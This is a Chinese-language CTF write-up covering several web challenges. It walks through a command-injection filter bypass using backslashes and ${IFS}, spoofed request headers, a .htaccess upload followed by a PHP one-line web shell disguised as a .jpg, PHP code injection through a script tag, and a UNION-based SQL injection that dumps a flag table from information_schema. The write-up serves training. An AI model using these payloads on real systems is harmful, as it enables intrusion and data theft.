加载过慢请开启缓存 浏览器默认开启
发现题目没有禁用ls,传个?rce=ls,发现有一个flag.php,用\绕过cat和flag的检测,用 ${IFS}代替空格
?rce=c\at${IFS}fl\ag.php
发现Flag在源码中
按照题目要求设置请求头
User-Agent: CTF-Robot/1.0
Cookie: session=valid_user
Referer: https://ctf.example.com
Cookie这里要带上原来的cookie
Cookie:PHPSESSID=5e5b3975b2539c04b222717b0199486c; session=valid_user
按照关卡步骤设置最后得到flag
这里抓包修改失败
网页标签提醒我们试试和某些文件配合,发现服务器是服务器是Apache,尝试上传.htaccess进行绕过。先上传.htaccess
在传一句话木马(.jpg格式),上传成功用蚁剑连接找到flag
这里发现script没有被禁用,%09代替空格构造payload:
?word=<script%09language=’php’>system(‘ls%09/‘)
发现flag文件
尝试?word=<script%09language=’php’>system(‘ct%09flg’)
好像不行,这里直接读取文件内容
<script%09language=’php’>system(‘strings%09/fl*’)
得到flag
题目给出提示
<?php
$sql = “SELECT username,password FROM users WHERE id = “.’((((((‘.$_GET[“id”].’))))))’;
$result = $conn->query($sql);
直接让id=1,id=2测字段到3时发现没有数据返回确认有两个字段
直接闭合括号union select 1,2#这里1,2都正常回显然后
-1))))))union select group_concat(schema_name),2 from information_schema.schemata#
查库名发现
nformation_schema,mysql,ctftraining,performance_schema,test,ctf
先试试ctftraining
查表名union select group_concat(table_name),2 from information_schema.tables where table_schema=’ctftraining’
查到一个flag再查flag中的字段名
-1))))))union select group_concat(column_name),2 from information_schema.columns where table_schema=’ctftraining’ and table_name=’flag’#
Flag中的字段名也叫flag直接查询得到flag
-1))))))union select group_concat(flag),2 from ctftraining.flag#
